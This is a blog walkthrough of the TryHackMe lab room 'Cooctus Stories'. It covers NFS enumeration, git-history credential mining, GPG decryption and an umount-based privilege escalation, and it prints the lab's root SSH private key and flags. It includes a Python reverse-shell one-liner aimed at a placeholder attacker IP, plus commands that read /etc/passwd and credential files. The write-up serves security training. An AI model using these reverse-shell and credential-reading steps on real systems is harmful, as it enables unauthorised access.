Skip to main content
HashnodeCyberWithSharon

Command Palette

Search for a command to run...

Cooctus Stories (TryHackMe)

Published
14 min read
Cooctus Stories (TryHackMe)
J
Jebitok

Software Developer | Learning Cybersecurity | Open for roles *

If you're in the early stages of your career in software development (student or still looking for an entry-level role) and in need of mentorship, you can reach out to me.

Cooctus Adventures is a TryHackMe challenge that follows the Overpass storyline, where an insider threat helped the Cooctus Clan compromise Overpass. The objective is to infiltrate their private server hidden in the Saharan Desert and uncover their plans. The box covers a range of techniques including NFS enumeration, web application exploitation via command injection, lateral movement across multiple users, code analysis, GPG decryption, git history forensics, and privilege escalation through a misconfigured mount. Each user on the box presents a unique challenge requiring a different approach, making this a solid machine for practising enumeration and chaining multiple attack vectors together.

The story so far...

Previously on Cooctus Tracker
Overpass has been hacked! The SOC team (Paradox, congratulations on the promotion) noticed suspicious activity on a late night shift while looking at shibes, and managed to capture packets as the attack happened. (From Overpass 2 - Hacked by NinjaJc01)

Present times
Further investigation revealed that the hack was made possible by the help of an insider threat. Paradox helped the Cooctus Clan hack overpass in exchange for the secret shiba stash. Now, we have discovered a private server deep down under the boiling hot sands of the Saharan Desert. We suspect it is operated by the Clan and it's your objective to uncover their plans.

Note: A stable shell is recommended, so try and SSH into users when possible.

Answer the questions below

Paradox is nomming cookies

nmap -p- -sV IP_Address

PORT      STATE SERVICE  VERSION
22/tcp    open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
111/tcp   open  rpcbind  2-4 (RPC #100000)
2049/tcp  open  nfs_acl  3 (RPC #100227)
8080/tcp  open  http     Werkzeug httpd 0.14.1 (Python 3.6.9)
36987/tcp open  nlockmgr 1-4 (RPC #100021)
37235/tcp open  mountd   1-3 (RPC #100005)
47401/tcp open  mountd   1-3 (RPC #100005)
56577/tcp open  mountd   1-3 (RPC #100005)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

gobuster dir -u http://IP_Address:8080 -w /usr/share/wordlists/dirb/common.txt -x php,html,txt
          
/cat                  (Status: 302) [Size: 219] [--> http://IP_Address:8080/login]
/login                (Status: 200) [Size: 556]
Progress: 18456 / 18460 (99.98%)

curl http://IP_Address:8080/cat
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>Redirecting...</title>
<h1>Redirecting...</h1>
<p>You should be redirected automatically to target URL: <a href="/login">/login</a>.  If not click the link.

curl http://IP_Address:8080/login
<html>
	<head>
		<title>C.A.T login</title>
		<meta name="viewport" content="width=device-width, initial-scal=1.0">
		<link href="static/bootstrap.min.css" rel="stylesheet" media="screen">
	</head>
	<body>
		<div class="container">
			<h1>Cookieless login page</h1>
			<br>
			<form action="" method="post">
				<input type="text" placeholder="Username" name="username" value="">
				<input type="password" placeholder="Password" name="password" value="">
				<input class="btn btn-default" type="submit" value="Login">
			</form>
		</div>
	</body>
</html>

showmount -e IP_Address
Export list for IP_Address:
/var/nfs/general *

mkdir /tmp/nfs

mount -t nfs IP_Address:/var/nfs/general /tmp/nfs -o nolock

ls -la /tmp/nfs
total 80
drwxr-xr-x  2 nobody nogroup  4096 Nov 21  2020 .
drwxrwxrwt 20 root   root    69632 Mar 31 10:56 ..
-rw-r--r--  1 root   root       31 Nov 21  2020 credentials.bak

cat /tmp/nfs/credentials.bak
paradoxial.test
ShibaPretzel79

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKBOX_IP",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

nc -lvnp 4444

nc -nlvp 4444
Listening on 0.0.0.0 4444
Connection received on IP_Address 34264
bash: cannot set terminal process group (783): Inappropriate ioctl for device
bash: no job control in this shell
paradox@cchq:~$ ls -la
ls -la
total 36
drwxr-xr-x 5 paradox paradox 4096 Feb 22  2021 .
drwxr-xr-x 6 root    root    4096 Jan  2  2021 ..
lrwxrwxrwx 1 paradox paradox    9 Feb 20  2021 .bash_history -> /dev/null
-rw-r--r-- 1 paradox paradox  220 Jan  2  2021 .bash_logout
-rw-r--r-- 1 paradox paradox 3882 Feb 20  2021 .bashrc
drwx------ 2 paradox paradox 4096 Jan  2  2021 .cache
drwxr-xr-x 4 paradox paradox 4096 Jan  1  2021 CATapp
drwx------ 3 paradox paradox 4096 Jan  2  2021 .gnupg
-rw-r--r-- 1 paradox paradox  807 Jan  2  2021 .profile
-rw------- 1 paradox paradox   38 Feb 20  2021 user.txt
paradox@cchq:~$ cat user.txt
cat user.txt
THM{2dccd1ab3e03990aea77359831c85ca2}

Find out what Szymex is working on

sudo -l
sudo -l
sudo: no tty present and no askpass program specified
paradox@cchq:~$ cat /etc/passwd | grep -v nologin | grep -v false
cat /etc/passwd | grep -v nologin | grep -v false
root:x:0:0:root:/root:/bin/bash
sync:x:4:65534:sync:/bin:/bin/sync
tux:x:1000:1000:tux:/home/tux:/bin/bash
szymex:x:1001:1001::/home/szymex:/bin/bash
varg:x:1002:1002::/home/varg:/bin/bash
paradox:x:1003:1003::/home/paradox:/bin/bash
paradox@cchq:~$ pwd
pwd
/home/paradox
paradox@cchq:~$ cd ../
cd ../
paradox@cchq:/home$ ls 
ls 
paradox
szymex
tux
varg

paradox@cchq:/home$ cd szymex
cd szymex
paradox@cchq:/home/szymex$ ls -la
ls -la
total 44
drwxr-xr-x 5 szymex szymex 4096 Feb 22  2021 .
drwxr-xr-x 6 root   root   4096 Jan  2  2021 ..
lrwxrwxrwx 1 szymex szymex    9 Feb 20  2021 .bash_history -> /dev/null
-rw-r--r-- 1 szymex szymex  220 Jan  2  2021 .bash_logout
-rw-r--r-- 1 szymex szymex 3865 Feb 20  2021 .bashrc
drwx------ 2 szymex szymex 4096 Jan  2  2021 .cache
drwx------ 3 szymex szymex 4096 Jan  2  2021 .gnupg
drwxrwxr-x 3 szymex szymex 4096 Jan  2  2021 .local
-r-------- 1 szymex szymex   11 Jan  2  2021 mysupersecretpassword.cat
-rw-rw-r-- 1 szymex szymex  316 Feb 20  2021 note_to_para
-rwxrwxr-- 1 szymex szymex  735 Feb 20  2021 SniffingCat.py
-rw------- 1 szymex szymex   38 Feb 22  2021 user.txt

paradox@cchq:/home/szymex$ cat user.txt
cat user.txt
cat: user.txt: Permission denied
paradox@cchq:/home/szymex$ 

cat note_to_para
cat note_to_para
Paradox,

I'm testing my new Dr. Pepper Tracker script. 
It detects the location of shipments in real time and sends the coordinates to your account.
If you find this annoying you need to change my super secret password file to disable the tracker.

You know me, so you know how to get access to the file.

- Szymex

cat SniffingCat.py
cat SniffingCat.py
#!/usr/bin/python3
import os
import random

def encode(pwd):
    enc = ''
    for i in pwd:
        if ord(i) > 110:
            num = (13 - (122 - ord(i))) + 96
            enc += chr(num)
        else:
            enc += chr(ord(i) + 13)
    return enc


x = random.randint(300,700)
y = random.randint(0,255)
z = random.randint(0,1000)

message = "Approximate location of an upcoming Dr.Pepper shipment found:"
coords = "Coordinates: X: {x}, Y: {y}, Z: {z}".format(x=x, y=y, z=z)

with open('/home/szymex/mysupersecretpassword.cat', 'r') as f:
    line = f.readline().rstrip("\n")
    enc_pw = encode(line)
    if enc_pw == "pureelpbxr":
        os.system("wall -g paradox " + message)
        os.system("wall -g paradox " + coords)

python3 -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
paradox@cchq:/home/szymex$ su szymex
su szymex
Password: cherrycoke

szymex@cchq:~$ cat user.txt
cat user.txt
THM{c89f9f4ef264e22001f9a9c3d72992ef}

Find out what Tux is working on

cat note_to_every_cooctus
cat note_to_every_cooctus
Hello fellow Cooctus Clan members

I'm proposing my idea to dedicate a portion of the cooctus fund for the construction of a penguin army.

The 1st Tuxling Infantry will provide young and brave penguins with opportunities to
explore the world while making sure our control over every continent spreads accordingly.

Potential candidates will be chosen from a select few who successfully complete all 3 Tuxling Trials.
Work on the challenges is already underway thanks to the trio of my top-most explorers.

Required budget: 2,348,123 Doge coins and 47 pennies.

Hope this message finds all of you well and spiky.

- TuxTheXplorer

cat note
cat note
Noot noot! You found me. 
I'm Mr. Skipper and this is my challenge for you.

General Tux has bestowed the first fragment of his secret key to me.
If you crack my NootCode you get a point on the Tuxling leaderboards and you'll find my key fragment.

Good luck and keep on nooting!

PS: You can compile the source code with gcc

cat nootcode.c
cat nootcode.c
#include <stdio.h>

#define noot int
#define Noot main
#define nOot return
#define noOt (
#define nooT )
#define NOOOT "f96"
#define NooT ;
#define Nooot nuut
#define NOot {
#define nooot key
#define NoOt }
#define NOOt void
#define NOOT "NOOT!\n"
#define nooOT "050a"
#define noOT printf
#define nOOT 0
#define nOoOoT "What does the penguin say?\n"
#define nout "d61"

noot Noot noOt nooT NOot
    noOT noOt nOoOoT nooT NooT
    Nooot noOt nooT NooT

    nOot nOOT NooT
NoOt

NOOt nooot noOt nooT NOot
    noOT noOt NOOOT nooOT nout nooT NooT
NoOt

NOOt Nooot noOt nooT NOot
    noOT noOt NOOT nooT NooT
NoOt

 cat /etc/group | grep testers
cat /etc/group | grep testers
testers:x:1004:tux,szymex

find / -name "tuxling*" -type d 2>/dev/null
find / -name "tuxling*" -type d 2>/dev/null
/home/tux/tuxling_3
/home/tux/tuxling_1
/media/tuxling_2
szymex@cchq:~$ ls -la /home/tux/tuxling_3
ls -la /home/tux/tuxling_3
total 12
drwxrwx--- 2 tux testers 4096 Feb 20  2021 .
drwxr-xr-x 9 tux tux     4096 Feb 20  2021 ..
-rwxrwx--- 1 tux testers  178 Feb 20  2021 note
szymex@cchq:~$ ls -la /media/tuxling_2
ls -la /media/tuxling_2
total 20
drwxrwx--- 2 tux  testers 4096 Feb 20  2021 .
drwxr-xr-x 3 root root    4096 Feb 20  2021 ..
-rw-rw-r-- 1 tux  testers  740 Feb 20  2021 fragment.asc
-rw-rw---- 1 tux  testers  280 Jan  2  2021 note
-rw-rw-r-- 1 tux  testers 3670 Feb 20  2021 private.key

cat /home/tux/tuxling_3/note
cat /media/tuxling_2/note
cat /media/tuxling_2/fragment.asc
cat /media/tuxling_2/private.keycat /home/tux/tuxling_3/note
cat /media/tuxling_2/fragment.asc
Hi! Kowalski here. 
I was practicing my act of disappearance so good job finding me.

Here take this,
The last fragment is: 637b56db1552

Combine them all and visit the station.
szymex@cchq:~$ cat /media/tuxling_2/note
Noot noot! You found me. 
I'm Rico and this is my challenge for you.

General Tux handed me a fragment of his secret key for safekeeping.
I've encrypted it with Penguin Grade Protection (PGP).

You can have the key fragment if you can decrypt it.

Good luck and keep on nooting!

szymex@cchq:~$ cat /media/tuxling_2/fragment.asc
-----BEGIN PGP MESSAGE-----

hQGMA5fUjrF1Eab6AQv/Vcs2Y6xyn5aXZfSCjCwKT1wxBgOcx2MBeat0wtAsYzkF
J6nWV3nBUyA2tXUBAHsr5iZnsuXubsG6d5th7z5UO8+1MS424I3Rgy/969qyfshj
iouZtXyaerR1/Sok3b1wk3iyPCn2cXc2HPP57bDqm15LEwO28830wun8twT6jX/+
Nr4tDW767gfADB/nJOFkAr+4rqHGY8J/bFnLHTZV2oVIYbFy0VarzcKBFQVQLx0G
OqF1A1nPHNCCENcHEzGbzogQoQbQK+8jefH8Epfs25zpsTTg/+z5XOnJQXD5UXg2
x9c0ABS9T8K3V6ZhyXPAxfSFpxUyVJBKhnugOd/QP4Kqzu30H1mWNxvE1jJQpcxs
uBJIzEtHn/efXQdsLM8swQ6RrnTAKRpK7Ew307itPSvaejCw87FCTaMzwXj2RNkD
8n6P/kZbTHrVdBS7KxGDJ/SsTpQgz8QpQyQIK/oDxNEP4ZsgosBJ4QnjVW8vNLZF
P72PMvolHYd461j62+uv0mQBTQhH5STUWq6OtHlHgbrnSJvGNll3WZ5BfCiE2O1C
8+UXEfCw05QMZgE2dePneZdWISNUkGTTVji9atq3l4b0vbHihNdwTTMfla8+arPs
eA0RkdEXuoYWvOpocvlU5XuTcCdy
=GDIs
-----END PGP MESSAGE-----

  • Fragment 1 (tuxling_1): f96050ad61

  • Fragment 2 (tuxling_2): decrypt to find out

  • Fragment 3 (tuxling_3): 637b56db1552 

    gpg --import /media/tuxling_2/private.key
<rivate.keygpg --import /media/tuxling_2/private.key
cat: unrecognized option '--import'
Try 'cat --help' for more information.
szymex@cchq:~$ gpg --import /media/tuxling_2/private.key
gpg --import /media/tuxling_2/private.key
gpg: key B70EB31F8EF3187C: public key "TuxPingu" imported
gpg: key B70EB31F8EF3187C: secret key imported
gpg: Total number processed: 1
gpg:               imported: 1
gpg:       secret keys read: 1
gpg:   secret keys imported: 1
szymex@cchq:~$ gpg --decrypt /media/tuxling_2/fragment.asc
gpg --decrypt /media/tuxling_2/fragment.asc
gpg: Note: secret key 97D48EB17511A6FA expired at Mon 20 Feb 2023 07:58:30 PM UTC
gpg: encrypted with 3072-bit RSA key, ID 97D48EB17511A6FA, created 2021-02-20
      "TuxPingu"
The second key fragment is: 6eaf62818d

    All three fragments collected:

    • Fragment 1: f96050ad61

    • Fragment 2: 6eaf62818d

    • Fragment 3: 637b56db1552

    Combined: f96050ad616eaf62818d637b56db1552

ssh tux@IP_Address
cat user.txt
THM{592d07d6c2b7b3b3e7dc36ea2edbd6f1}

Find out what Varg is working on


tux@cchq:/home/varg/cooctOS_src$ cat /etc/group | grep os_tester
os_tester:x:1005:tux,varg
tux@cchq:/home/varg/cooctOS_src$ git log --oneline
8b8daa4 (HEAD -> master) Removed CooctOS login script for now
6919df5 Created git repo for CooctOS
tux@cchq:/home/varg/cooctOS_src$ git show HEAD
commit 8b8daa41120535c569d0b99c6859a1699227d086 (HEAD -> master)
Author: Vargles <varg@cchq.noot>
Date:   Sat Feb 20 15:47:21 2021 +0000

    Removed CooctOS login script for now

diff --git a/bin/CooctOS.py b/bin/CooctOS.py
deleted file mode 100755
index 4ccfcc1..0000000
--- a/bin/CooctOS.py
+++ /dev/null
@@ -1,52 +0,0 @@

git show 6919df5
commit 6919df5c171460507f69769bc20e19bd0838b74d
Author: Vargles <varg@cchq.noot>
Date:   Sat Feb 20 15:46:28 2021 +0000

    Created git repo for CooctOS

diff --git a/bin/CooctOS.py b/bin/CooctOS.py
new file mode 100755
index 0000000..4ccfcc1
--- /dev/null
+++ b/bin/CooctOS.py
@@ -0,0 +1,52 @@
+#!/usr/bin/python3
+
+import time
+import os;
+import pty;
+
+#print(chr(27)+ "[2J")
+logo = """\033[1;30;49m
+ \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557  \u2588\u2588\u2588\u2588\u2588\u2588\u2557  \u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557 \033[1;37;49m\u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\033[1;30;49m
+\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2554\u2550\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2588\u2588\u2554\u2550\u2550\u255d\033[1;37;49m\u2588\u2588\u2554\u2550\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\033[1;30;49m
+\u2588\u2588\u2551     \u2588\u2588\u2551   \u2588\u2588\u2551\u2588\u2588\u2551   \u2588\u2588\u2551\u2588\u2588\u2551        \u2588\u2588\u2551   \033[1;37;49m\u2588\u2588\u2551   \u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\033[1;30;49m
+\u2588\u2588\u2551     \u2588\u2588\u2551   \u2588\u2588\u2551\u2588\u2588\u2551   \u2588\u2588\u2551\u2588\u2588\u2551        \u2588\u2588\u2551   \033[1;37;49m\u2588\u2588\u2551   \u2588\u2588\u2551\u255a\u2550\u2550\u2550\u2550\u2588\u2588\u2551\033[1;30;49m
+\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2557   \u2588\u2588\u2551   \033[1;37;49m\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\033[1;30;49m
+ \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d  \u255a\u2550\u2550\u2550\u2550\u2550\u255d  \u255a\u2550\u2550\u2550\u2550\u2550\u255d   \u255a\u2550\u255d    \033[1;37;49m\u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\033[1;30;49m
+"""
+print(logo)
+print("                       LOADING")
+print("[", end='')
+
+for i in range(0,60):
+    #print(chr(27)+ "[2J")
+    #print(logo)
+    #print("                       LOADING")
+    print("[", end='')
+    print("=" * i, end='')
+    print("]")
+    time.sleep(0.02)
+    print("\033[A\033[A")
+
+print("\032")
+print("\033[0;0m[ \033[92m OK  \033[0;0m] Cold boot detected. Flux Capacitor powered up")
+
+print("\033[0;0m[ \033[92m OK  \033[0;0m] Mounted Cooctus Filesystem under /opt")
+
+print("\033[0;0m[ \033[92m OK  \033[0;0m] Finished booting sequence")
+

git show 6919df5 | tail -20
+  clear();
+  printRoom(rum);
+
+  gotoxy(0,13);
+  tcsetattr( STDIN_FILENO, TCSANOW, &oldt); //restoring original terminal configuration
+  clear();
+  return 0;
+}
diff --git a/games/note b/games/note
new file mode 100644
index 0000000..00e6388
--- /dev/null
+++ b/games/note
@@ -0,0 +1,6 @@
+Hey Varg! 
+
+I've created a little game called Adventure. 
+If you like it, we could ship it with the OS when it's ready :)
+
+- Tux

git show 6919df5 | grep -A 5 -i "password\|username\|login\|varg"
Author: Vargles <varg@cchq.noot>
Date:   Sat Feb 20 15:46:28 2021 +0000

    Created git repo for CooctOS

diff --git a/bin/CooctOS.py b/bin/CooctOS.py
--
+uname = input("\ncookie login: ")
+pw = input("Password: ")
+
+for i in range(0,2):
+    if pw != "slowroastpork":
+        pw = input("Password: ")
+    else:
+        if uname == "varg":
+            os.setuid(1002)
+            os.setgid(1002)
+            pty.spawn("/bin/rbash")
+            break
+        else:
+            print("Login Failed")
+            break
diff --git a/boot/grub/default b/boot/grub/default
new file mode 100644
index 0000000..e69de29
diff --git a/boot/grub/gfxblacklist.txt b/boot/grub/gfxblacklist.txt
--
+Hey Varg! 
+
+I've created a little game called Adventure. 
+If you like it, we could ship it with the OS when it's ready :)
+
+- Tux

su varg
Password: slowroastpork

cat user.txt
THM{3a33063a4a8a5805d17aa411a53286e6}

Get full root privileges

sudo -l
Matching Defaults entries for varg on cchq:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User varg may run the following commands on cchq:
    (root) NOPASSWD: /bin/umount
varg@cchq:~$ mount | grep -v "tmpfs\|cgroup\|proc\|sys\|dev"
sunrpc on /run/rpc_pipefs type rpc_pipefs (rw,relatime)
varg@cchq:~$ find / -perm -4000 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/bin/newgrp
/usr/bin/at
/usr/bin/pkexec
/usr/bin/gpasswd
/usr/bin/traceroute6.iputils
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/chsh
/home/varg/CooctOS.py
/bin/ping
/bin/mount
/bin/su
/bin/umount
/bin/fusermount
/sbin/mount.nfs

ls -la /opt
total 12
drwxr-xr-x  3 root root      4096 Feb 20  2021 .
drwxr-xr-x 24 root root      4096 Feb 20  2021 ..
drwxrwx--- 11 varg os_tester 4096 Feb 20  2021 CooctFS

sudo /bin/umount /opt/CooctFS
ls -la /opt/CooctFS
total 12
drwxr-xr-x 3 root root 4096 Feb 20  2021 .
drwxr-xr-x 3 root root 4096 Feb 20  2021 ..
drwxr-xr-x 5 root root 4096 Feb 20  2021 root
varg@cchq:~$ ls -la /opt/CooctFS/root
total 28
drwxr-xr-x 5 root root 4096 Feb 20  2021 .
drwxr-xr-x 3 root root 4096 Feb 20  2021 ..
lrwxrwxrwx 1 root root    9 Feb 20  2021 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3106 Feb 20  2021 .bashrc
drwx------ 3 root root 4096 Feb 20  2021 .cache
drwxr-xr-x 3 root root 4096 Feb 20  2021 .local
-rw-r--r-- 1 root root   43 Feb 20  2021 root.txt
drwxr-xr-x 2 root root 4096 Feb 20  2021 .ssh
varg@cchq:~$ cat /opt/CooctFS/root/root.txt
hmmm...
No flag here. You aren't root yet.


ls -la /opt/CooctFS/root/.ssh
total 16
drwxr-xr-x 2 root root 4096 Feb 20  2021 .
drwxr-xr-x 5 root root 4096 Feb 20  2021 ..
-rw-r--r-- 1 root root 1679 Feb 20  2021 id_rsa
-rw-r--r-- 1 root root  391 Feb 20  2021 id_rsa.pub

cat /opt/CooctFS/root/.ssh/id_rsa


echo "-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAx2+vTyYoQxGMHh/CddrGqllxbhNo3P4rPNqQiWkTPFnxxNv6
5vqc2vl5vd3ZPcOHp3w1pIF3MH6kgY3JicvfHVc3phWukXuw2UunYtBVNSaj6hKn
DwIWH3xCnWBqG6BR4dI3woQwOWQ6e5wcKlYz/mqmQIUKqvY5H3fA8HVghu7ARSre
9lVwzN4eat2QPnK0BbG3gjhLjpN0ztp0LrQI1SCwBJXSwr5H8u2eU25XVVmmEvdY
+n9+v+Mon2Ne7vCobNjv4MMzXal50BlwlhNtwgwt1aWgNOyPhQFE6ceg4lGEWOUq
Jz2sMB4GzqER8/G9ESan7UOtrarhvHtC+l5g2QIDAQABAoIBAC9qKRa7LqVLXbGn
wVa9ra/AVgxihvLLZsIwAF764Tze8XDpD8ysVnBlEYGHZeeePfkeua4jrY+U/E1k
xT6Cfsf9/Vf6Haeu7Yurxd7jQu7BAgVba+ZQi6vuofPCgVeSFQWIMgOH4+MxJgpP
Qg76sZ/SATajqraclVYa5X8FmO5bF1MEqFLtszsGR0QDgY21o0DSaeou5F1WRPJ6
Q8EogxMj2G393BrlZfdoL4j/3iZoEwFwEtMc9SX435bnxcEnv+x4lDmC1MRY1TgZ
fx558Lswfnz5FIl1HCHIVvOKnTFq16O7fAoCldVDCaRr+SDbOk71UDxcQN2SgMDH
KDQmPmUCgYEA6RtG4wwpJYRMgTij+Pkutg4/CaNXTn0/NmSET//x57hxiFThNBK9
7DtlR7FTvoN1mp3AvLSk0sVmalewnilDyFjrVc1QUYZkBAguSmVgABO80usrPNfx
eanBrzDSHG9jUk+Nhmv+dctgnvwurLBVB86PzngxA6wxDQE64bS0Qz8CgYEA2wXg
Ltr5gWjHuwdctaFSPNqms6TutxqV2F8DNsZW7zgTI+j6CUIbhQ8FcH3NhSX6K2gE
vYIbiMDM3U3WVIOqp+piWAqPHwps4if1SHbXOgFtUBSpYwJj3jFE/qohMYIpJXU4
sE8TgrK8iUylI741fYrB2CG/OjvH5vsZ2e5UjecCgYBGjATGDhYdzo5AxV2Kqg8i
9ejKB+8SSAFrerw4YeNaF430jouhcNKdvdQHAHmxvKNI6dk8wwbm6ur14BgJpb9n
0NFYJEzcf2mhdsBbr5aAL3kD9Dwfq9Le2StO092i0WsjrAPO3Lwj9isFspiFltAF
DtSizek3jVNC9k5VpJSxjQKBgQDNS0uf/6aA8yrLlxICOWzxF23L0xviSywLPLux
euV/osrmDPlY9jr/VF4f2/tpA3jjeMOAslSGsVkVUmFEpImwjNSTe4o9aTM4JIYX
3zTL7Qx+VG+VG2dqnDn0jplAY6WXs7FoKSa7ijeIZmwf/aj7vLUHllI9Dk3IprLL
gEaHHwKBgQDQQ3tLEWwGbULkIXiKopgN/6ySp23TVFHKK8D8ZXzRgxiroBkG129t
FXhWaDVCDTHczV1Ap3jKn1UKFHdhsayK34EAvRiTc+onpkrOMEkK6ky9nSGWSWbr
knJ1V6wrLgd2qPq2r5g0a/Qk2fL0toxFbnsQRsueVfPwCQWTjSo/Wg==
-----END RSA PRIVATE KEY-----" > /tmp/root_rsa

chmod 600 /tmp/root_rsa
ssh -i /tmp/root_rsa root@10.48.183.254
cat root.txt
THM{H4CK3D_BY_C00CTUS_CL4N}

Credits

First of all thank you for checking out my room! It took me way too long to put together so I hope you had some fun.

Also thanks to these wonderful people:

  • Varg - For creating the amazing Cooctus Clan designs

  • NinjaJc01 - For the Overpass series, tips & help with the theme and box development

  • Paradox - Emotional support & box dev tips

  • Szymex - Hosting the modded Minecraft server

Conclusion

Cooctus Adventures is a well-crafted room that rewards methodical enumeration at every stage. The initial foothold came from an exposed NFS share leaking credentials, which led to a web login and a command injection vulnerability in the CAT application. From there, lateral movement required reading and reversing code — ROT13 in SniffingCat.py, obfuscated C macros in the Tuxling challenges, and GPG decryption for the key fragments. Git history forensics revealed Varg's credentials, and the final privilege escalation exploited a world-readable SSH key exposed by unmounting a filesystem overlay. The key takeaway is that enumeration doesn't stop after initial access — every user's home directory and every readable file is a potential stepping stone to the next flag.

#privilege-escalation#tryhackme#websecurity#git-forensics#cryptography

Comments

Join the discussion

No comments yet. Be the first to comment.

More from this blog

C

CyberWithSharon

436 posts

Cooctus Stories (TryHackMe)